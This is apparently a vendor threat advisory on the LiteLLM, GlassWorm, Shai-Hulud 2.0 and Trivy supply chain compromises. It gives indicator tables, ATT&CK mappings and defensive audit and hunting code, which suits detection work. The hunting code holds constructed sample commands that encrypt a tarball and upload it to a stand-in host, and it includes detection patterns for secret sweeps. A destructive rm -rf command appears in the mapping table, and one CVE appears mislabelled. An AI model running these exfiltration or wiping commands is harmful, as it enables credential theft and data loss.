Supply Chain Compromise, LiteLLM, Shai-Hulud, GlassWorm, Trivy, AI/ML Infrastructure, PyPI Malicious Package, Third-Party Risk, Secret Exfiltration, Credential Harvesting, AI Security
Source Material: LiteLLM, Wiz, Cyber Security News | Technology: Python (PyPI), Node.js (npm), MCP, Cloud Infrastructure, GitHub | Targeted Industries: E-commerce, Finance, Human Resources, Technology, Healthcare, Telecommunications
Executive Summary
Supply chain attacks have become increasingly common as malicious actors target trusted third-party vendors and open-source dependencies to compromise downstream organizations at scale.
A software supply chain attack occurs when malicious code is inserted into a trusted third-party application or dependency, subsequently infecting all “downstream” users who download or use it. Because the average software project has many dependencies, a single infected package can trigger a large number of compromises across the globe. These attacks take various forms, including open-source repository compromises and CI/CD infrastructure breaches.
These attacks exploit the complex web of modern software dependencies, allowing adversaries to breach countless secure environments through a single compromised upstream entry point.
Threat Overview and Strategic Impact
Recently, the threat landscape has seen sophisticated automated campaigns predominantly exploiting open-source ecosystems like npm and PyPI. Notable examples include the Shai-Hulud 2.0 npm worm, the Trivy compromise, GlassWorm, and the LiteLLM Python library, which was compromised by the threat actor TeamPCP this week. Malicious versions of LiteLLM (1.82.7 and 1.82.8) deployed a persistent credential stealer via a .pth file that executes automatically on Python interpreter startup, harvesting secrets including cloud tokens, SSH keys, and Kubernetes configurations.
Threat actors are utilizing worms, directly targeting AI infrastructure, and integrating into CI/CD pipelines to achieve immediate, highly privileged access across global environments.
LiteLLM (Python/PyPI): On March 24, 2026, malicious versions (1.82.7 and 1.82.8) of LiteLLM, a widely used AI routing library with over 95 million monthly downloads, were uploaded to PyPI. Attributed to TeamPCP, the attack injects obfuscated code and a malicious litellm_init.pth file that executes automatically on Python startup. The payload is designed to perform broad credential theft, sweeping the environment for SSH keys, digital wallets, Kubernetes configuration files, and authentication tokens for major cloud providers (Azure, GCP, and AWS). The malware also attempts lateral movement by deploying privileged pods in Kubernetes kube-system namespaces to install a persistent systemd backdoor.
GlassWorm (Multi-Ecosystem / MCP): GlassWorm operates as an autonomous, self-spreading malware that specifically infiltrates developer environments through compromised Visual Studio Code extensions, GitHub repositories, and the npm registry. Threat actors hijack legitimate maintainer accounts to force-push malicious commits, obfuscating their payloads using invisible Unicode characters to bypass human code review and automated static analysis. Upon execution, the malware systematically harvests developer credentials, infrastructure keys, and cryptocurrency assets. It uses a takedown-resistant C2 architecture that leverages the Solana blockchain as a “dead drop,” resolving instructions and secondary payload URLs by polling specific Solana transaction memos. This effectively bypasses traditional DNS/IP-based network monitoring. The malware is geofenced to avoid execution on Russian-language systems and establishes persistence on compromised developer workstations, attempting to automatically backdoor other dependencies to propagate throughout the software ecosystem.
Shai-Hulud 2.0 (Node.js/npm): A self-replicating npm worm infected 796 npm packages (totaling over 20 million weekly downloads) by late 2025. It injects malicious JavaScript files to install the Bun runtime, bypassing standard Node.js monitoring, and executes an obfuscated credential-stealing payload. Exfiltration is performed, unusually, by creating public GitHub repositories titled “Sha1-Hulud: The Second Coming.” The worm propagates by stealing the victim’s npm credentials to backdoor their other published packages and, if unsuccessful, attempts to delete the user’s home directory.
Trivy (Aqua Security): TeamPCP executed a complex, multi-stage supply chain breach against Trivy, Aqua Security’s popular open-source vulnerability scanning tool. This is the same threat actor responsible for the recent LiteLLM supply chain compromise. Leveraging an incompletely revoked GitHub Personal Access Token stolen weeks prior, the attackers hijacked the aqua-bot service account to distribute backdoored Trivy binaries and force-push malicious commits to version tags in the trivy-action repository. This “tag poisoning” allowed attacker-controlled code to run automatically in downstream CI/CD pipelines without alerting developers. The malware read directly from GitHub Actions Runner memory, harvesting a massive amount of cloud credentials (AWS, GCP, Azure), Kubernetes tokens, SSH keys, Docker registry credentials, and cryptocurrency wallets.
Malicious actors are exploiting the inherent trust developers place in tools and libraries to achieve immediate, highly privileged access, transforming routine dependency updates into catastrophic breaches.
Security Hardening and Recommendations
Organizations must proactively secure their software supply chains:
- Audit and Pin Dependencies: Maintain an inventory of all open-source libraries. Ensure environments do not run compromised versions of LiteLLM (1.82.7/1.82.8) and identify unauthorized npm packages matching Shai-Hulud 2.0 indicators. Pin dependencies to known-good versions and carefully review lockfiles.
- Mandatory Credential Rotation: If a compromised package is discovered, treat the environment as fully breached and instantly rotate all SSH keys, cloud tokens, database passwords, and API keys.
- Implement Zero Trust & Behavioral Analysis: Since compromised software leverages legitimate execution paths, deploy Zero Trust architecture to require continuous validation and limit lateral movement. Use behavioral-based detection to catch anomalies, such as unexpected cloud metadata queries or irregular archival commands.
- Network Blocking: Block outbound traffic to known exfiltration and C2 domains, including scan.aquasecurtiy[.]org, checkmarx[.]zone, models.litellm[.]cloud, and tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]io.
- Third-Party Risk Assessments: Thoroughly vet new and existing vendors for their security practices. Implement Subresource Integrity (SRI) for JavaScript and test third-party software before deployment. Use tools to detect shadow IT that might introduce unvetted dependencies.
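The dependency audit above can be automated. The following is an added example (not code from this advisory or from the LiteLLM project) that checks requirement pins for the malicious LiteLLM versions and scans a site-packages directory for .pth files containing import lines, which is how litellm_init.pth gains execution at interpreter startup. The build_sample_site helper and its file contents are constructed for illustration; in practice pass the real site-packages path.

```python
"""Added example, not the advisory's or the LiteLLM project's code: audit a
Python environment for the malicious LiteLLM pins and for .pth files that run
code at interpreter startup (the mechanism behind litellm_init.pth).
Sample files are constructed; pass a real site-packages path in practice."""
import re
import tempfile
from pathlib import Path

COMPROMISED_LITELLM = {"1.82.7", "1.82.8"}  # versions named in the advisory
PIN_RE = re.compile(r"^\s*litellm\s*==\s*([0-9][\w.]*)", re.IGNORECASE)


def compromised_pins(requirements_text: str) -> list[str]:
    """Requirement lines that pin litellm to a compromised version."""
    hits = []
    for line in requirements_text.splitlines():
        m = PIN_RE.match(line)
        if m and m.group(1) in COMPROMISED_LITELLM:
            hits.append(line.strip())
    return hits


def executable_pth_files(site_packages: Path) -> list[tuple[str, str]]:
    """(file, line) for every .pth line site.py would exec() at startup.
    Only lines starting 'import ' or 'import\\t' run; other lines just extend sys.path."""
    findings = []
    for pth in sorted(site_packages.glob("*.pth")):
        for raw in pth.read_text(errors="replace").splitlines():
            if raw.startswith(("import ", "import\t")):
                findings.append((pth.name, raw.rstrip()))
    return findings


def audit(site_packages: Path, requirements_text: str) -> dict:
    """One report a CI step can fail on: bad pins plus code-running .pth files."""
    pth = executable_pth_files(site_packages)
    return {
        "compromised_pins": compromised_pins(requirements_text),
        "executable_pth": pth,
        "litellm_init_pth": any(name == "litellm_init.pth" for name, _ in pth),
    }


def build_sample_site() -> Path:
    """Constructed site-packages: one benign path-only .pth, one import-style .pth."""
    root = Path(tempfile.mkdtemp()) / "site-packages"
    root.mkdir()
    (root / "vendor-paths.pth").write_text("/opt/vendor/lib\n")
    # Stand-in for the dropped file: a harmless import line, not the real payload.
    (root / "litellm_init.pth").write_text("import os\n")
    return root
```

Any import-style .pth file that is not accounted for by a known package (setuptools, editable installs) deserves a look, not only one named litellm_init.pth.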
How Deepwatch Protects Our Customers
- Detection: We are reviewing existing detections associated with identified TTPs to ensure coverage, developing new detections as applicable, and we have raised awareness around related alerting to our SOC.
- Threat Hunting: Our teams are actively hunting for known IOCs.
- Threat Intelligence: Our teams are reviewing newly identified IOCs, TTPs, and reporting related to Supply Chain Compromise to feed into our detection platform.
Threat Hunting Leads
- Search for processes utilizing curl to upload .tar.gz files (e.g., tpcp.tar.gz) combined with OpenSSL encryption commands (enc -aes-256-cbc)
- Hunt for abnormal grep commands searching for .env, ssh, or webhook URLs (hooks.slack[.]com) within CI/CD runner processes
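The two hunting leads above expressed as rules over process-creation telemetry, as an added example that is not the advisory's own tooling. Each event is assumed to be a dict with pid, session, parent and cmdline fields (names constructed to stand in for an EDR or auditd execve record); the sample events are constructed, not real telemetry.

```python
"""Added example, not the advisory's own tooling: the two hunting leads above as
rules over process-creation events (dicts with pid, session, parent, cmdline).
Field names and sample events are constructed."""
import re

RULES = {
    # curl pushing a tarball (-T/--upload-file, -F field=@file, or -d @file)
    "curl_tarball_upload": re.compile(
        r"\bcurl\b.*(?:-T|--upload-file|-F\s+\S+=@|-d\s+@)\s*\S*?\.tar\.gz"),
    # OpenSSL symmetric encryption of the staged archive
    "openssl_aes_cbc": re.compile(r"\bopenssl\s+enc\b.*-aes-256-cbc", re.I),
    # grep sweeping for .env files, ssh material or Slack webhook URLs
    "grep_secret_sweep": re.compile(r"\bgrep\b.*(?:\.env\b|\bssh\b|hooks\.slack\.com)", re.I),
}
CI_PARENTS = {"Runner.Worker", "Runner.Listener", "gitlab-runner"}  # CI runner parents


def classify(event: dict) -> list[str]:
    """Names of every rule the event's command line trips."""
    return [name for name, rx in RULES.items() if rx.search(event.get("cmdline", ""))]


def hunt(events: list[dict]) -> list[dict]:
    """Per-event findings; a secret sweep under a CI runner parent rates 'high'."""
    findings = []
    for ev in events:
        tags = classify(ev)
        if not tags:
            continue
        high = "grep_secret_sweep" in tags and ev.get("parent") in CI_PARENTS
        findings.append({"pid": ev["pid"], "tags": tags, "severity": "high" if high else "medium"})
    return findings


def staged_exfil_sessions(events: list[dict]) -> set:
    """Sessions where encryption and a tarball upload both occurred (first lead)."""
    seen = {}
    for ev in events:
        seen.setdefault(ev.get("session"), set()).update(classify(ev))
    return {s for s, t in seen.items() if {"openssl_aes_cbc", "curl_tarball_upload"} <= t}


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"pid": 101, "session": "s1", "parent": "bash",
     "cmdline": "openssl enc -aes-256-cbc -in staged.tar -out tpcp.tar.gz -pass file:k"},
    {"pid": 102, "session": "s1", "parent": "bash",
     "cmdline": "curl -s -T tpcp.tar.gz https://upload.example.invalid/"},
    {"pid": 103, "session": "s2", "parent": "Runner.Worker",
     "cmdline": "grep -r hooks.slack.com /home/runner/work"},
    {"pid": 104, "session": "s3", "parent": "bash",  # benign download, no upload flag
     "cmdline": "curl -sL https://example.invalid/release.tar.gz -o release.tar.gz"},
]
```

Session correlation matters because neither an openssl enc nor a curl upload is suspicious on its own; the pair inside one session is the lead.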
Technical Artifacts
LiteLLM
| Indicator Type | Value | Description |
| --- | --- | --- |
| Domain | models.litellm[.]cloud | The primary C2 and exfiltration domain to which the LiteLLM 1.82.8 credential stealer sends harvested data. |
| Domain | checkmarx[.]zone | Secondary C2 domain used by the LiteLLM 1.82.7 payload (as well as in related KICS compromises). |
| Domain | manpages[.]wtf | A redirect target domain reached via a Namecheap URL forward from litellm[.]cloud. |
| SHA256 Hash | 71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238 | The malicious Python startup file litellm_init.pth dropped by compromised LiteLLM version 1.82.8; it executes automatically on interpreter initialization. |
| SHA256 Hash | a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b | The file backdoored with a 12-line obfuscated payload in LiteLLM version 1.82.7, found at litellm/proxy/proxy_server.py. |
| SHA256 Hash | 6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a | A persistent backdoor file deployed by the TeamPCP malware as a systemd user service named “System Telemetry Service” at ~/.config/sysmon/sysmon.py. |
| File Name | tpcp.tar.gz | A compressed archive containing the stolen developer secrets and credentials, encrypted with AES-256 and RSA-4096 and staged for exfiltration. |
GlassWorm
| Indicator Type | Value | Description |
| --- | --- | --- |
| Package | @iflow-mcp/watercrawl-watercrawl-mcp | A malicious Model Context Protocol (MCP) server package published on npm to distribute the GlassWorm malware. |
| IP Address | 45.32.150[.]251 | The primary command-and-control (C2) server used to download the stage-two operating-system-specific payloads and the JavaScript RAT. |
| IP Address | 217.69.3[.]152 | The exfiltration server destination for the ZIP archive containing harvested browser data and system profiles. |
| IP Address | 45.150.34[.]158 | The exfiltration server destination specifically designated to receive stolen Ledger and Trezor hardware wallet 24-word recovery phrases. |
Shai-Hulud 2.0
| Indicator Type | Value | Description |
| --- | --- | --- |
| File Name | setup_bun.js | A malicious JavaScript file injected into npm preinstall scripts to fetch and install the Bun runtime. |
| File Name | bun_environment.js | A massive, obfuscated 10MB+ payload executed by the Bun runtime to actively harvest credentials. |
| GitHub Repo/Branch/Workflow Name | shai-hulud-workflow.yml, discussion.yaml, formatter_*.yml | Malicious GitHub Actions workflow files created by the malware to extract secrets and establish remote code execution via GitHub discussions. |
| File Name | actionsSecrets.json, truffleSecrets.json, cloud.json, contents.json, environment.json | Local JSON files containing double Base64-encoded secrets and environment data staged for exfiltration. |
| GitHub Artifact | SHA1HULUD | The name of the malicious self-hosted GitHub Actions runner registered by the malware to maintain a persistent backdoor. |
| URL | hxxps://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7 | A known malicious webhook endpoint used during the attack chain. |
Trivy
| Indicator Type | Value | Description |
| --- | --- | --- |
| Domain | aquasecurtiy[.]org, scan.aquasecurtiy[.]org | Typosquatted C2 used in the Trivy attack |
| IP Address | 45.148.10[.]212 | Resolved IP for scan.aquasecurtiy[.]org |
| Domain | tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]io | ICP canister C2 dead-drop / fallback C2 |
Threat Object Mapping
- TeamPCP (Aliases: DeadCatx3, PCPcat, ShellForce)
- Shai-Hulud
- Lapsus$ (TeamPCP reportedly partnered with Lapsus$ for extortion)
Attack Pattern (MITRE ATT&CK):
| Tactic | Technique | Technique ID | Associated Threat Activity |
| --- | --- | --- | --- |
| Initial Access | Supply Chain Compromise | T1195.002 | Compromise of Software Dependencies and Development Tools |
| Initial Access | Exploit Public-Facing Application | T1190 | Exploitation of React2Shell (CVE-2025-29927) |
| Execution | Command and Scripting Interpreter | T1059 | Shell, Python, JavaScript, and container-executed payloads |
| Persistence | Scheduled Task / Cron | T1053.003 | Systemd services deployed for persistent execution (sysmon.service, pgmon.service) |
| Persistence | Escape to Host | T1611 | Privileged DaemonSets mounting host filesystems (/host) |
| Credential Access | Unsecured Credentials: Credentials in Files | T1552.001 | Harvesting .env files, SSH keys, and cloud secrets |
| Credential Access | Unsecured Credentials: Cloud Instance Metadata API | T1552.005 | Querying AWS IMDS (169.254.169[.]254) for IAM credentials |
| Command and Control | Encrypted Channel | T1573 | Use of the Sliver C2 framework |
| Exfiltration | Exfiltration Over C2 Channel / Web Service | T1041 / T1567 | Uploading tpcp.tar.gz to typosquatted domains via curl |
| Impact | Data Destruction | T1485 | Wiping nodes using rm -rf / --no-preserve-root |
Vulnerabilities:
- CVE-2026-33634 (Trivy supply chain attack)
- CVE-2025-29927 (React2Shell)
However, because these are supply chain compromises that exploit legitimate architectural trust rather than traditional software flaws, they often do not map to specific CVEs. The following Common Weakness Enumerations (CWEs) accurately describe the weaknesses exploited in these campaigns:
- CWE-494: Download of Code Without Integrity Check
- CWE-522: Insufficiently Protected Credentials
Malware/Tools:
- LiteLLM PyPI Backdoor (Versions 1.82.7, 1.82.8)
- Shai-Hulud 2.0 npm worm
- Trufflehog (Downloaded by Shai-Hulud to actively hunt for secrets)
- GlassWorm JavaScript RAT
- Watercrawl malicious MCP package
- TeamPCP Cloud Stealer
- CanisterWorm
- Sliver C2 framework
- XMRig (Cryptominer)
- FRPS and Gost (Proxy/Tunneling)
Additional Sources
- https://thehackernews.com/2026/03/glassworm-malware-uses-solana-dead.html
- https://cyberinsider.com/new-supply-chain-attack-hits-litellm-with-95m-monthly-downloads/
- https://github.com/DataDog/indicators-of-compromise/tree/main/shai-hulud-2.0
- https://blog.dreamfactory.com/the-litellm-supply-chain-attack-a-complete-technical-breakdown-of-what-happened-who-is-affected-and-what-comes-next
- https://www.microsoft.com/en-us/security/blog/2026/03/24/detecting-investigating-defending-against-trivy-supply-chain-compromise/
- https://www.scientificamerican.com/article/glassworm-malware-hides-in-invisible-open-source-code/
- https://www.cisa.gov/news-events/alerts/2025/09/23/c-supply-chain-compromise-impacting-npm-ecosystem
- https://unit42.paloaltonetworks.com/npm-supply-chain-attack/
- https://hackread.com/teampcp-trivy-checkmarx-litellm-credential-theft/
- https://www.crowdstrike.com/en-us/blog/from-scanner-to-stealer-inside-the-trivy-action supply-chain-compromise/